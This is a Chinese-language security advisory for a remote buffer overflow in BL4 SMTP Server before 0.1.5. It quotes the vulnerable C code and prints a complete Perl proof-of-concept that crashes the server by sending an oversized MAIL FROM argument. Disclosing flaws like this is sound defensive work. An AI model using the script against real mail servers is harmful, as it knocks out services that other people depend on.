BL4 SMTP Server远程缓冲区溢出漏洞

发布日期：2006-04-27
更新日期：2006-04-27

受影响系统：

BL4 SMTP Server < 0.1.5

描述：

---

BUGTRAQ  ID: 17714

BL4 SMTP Server是一款仅限入站的SMTP server。

BL4 SMTP Server的SMTP服务处理客户端发送的命令参数时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞在服务器上执行任意指令。

远程攻击者可以反复的发送多于2100字节的报文做为对EHLO、MAIL FROM和RCPT TO命令的参数，导致服务器崩溃或执行任意代码。

------------------think.c-----------------------------------
                ...........
                {
                        slaveEmail[x]->isData = 0;
                        slaveEmail[x]->emailFrom = 0;
                        slaveEmail[x]->emailTo = 0;
                        free(buffer);
                        buffer = malloc(sizeof(char) * 12);
                        sprintf(buffer, "250 OK\r\n");
                        return buffer;
                }
                free(buffer);
                .............
        slaveEmail[x]->EHLO = buffer;
                slaveEmail[x]->EHLOtrue = 1;

                buffer = malloc(sizeof(char) * 12);
                sprintf(buffer, "250 OK\r\n");
                return buffer;
-----------------------------------------------------------
    --
    sprintf(buffer, "250 OK\r\n");
    --
    Vulnerable for format strings.
    
    --
    free(buffer);
        buffer = malloc(sizeof(char) * 12);
    --
    Vulnerable for buffer overflow.

<*来源：Dedi Dwianto
  
  链接：http://advisories.echo.or.id/adv/adv30-theday-2006.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

~~~~~~~~~~~~

#!/usr/bin/perl

use IO::Socket;
use Socket;

my($socket) = "";


if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";


        print " -- Connecting To SMTP server at $adr port $prt ... \n";

        sleep(1);

        print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";

        sleep(1);

        print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";

        sleep(1);
        printf("[+]Ok!\n");
        printf("[+]Crash service.....\n");
        printf("[~]Done.\n");

        close($socket);


sub usage()
{
print "\n=========================================\r\n";
print "     BL4's SMTP server Remote DOS \r\n";
print "=========================================\r\n";
print "       Bug Found by Dedi Dwianto \r\n";
print "    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
print "      Echo Security Research Group \r\n";
print "=========================================\r\n";
print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
exit();
}


---------------------------------------------------------------------------

建议：

---

厂商补丁：

BL4
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0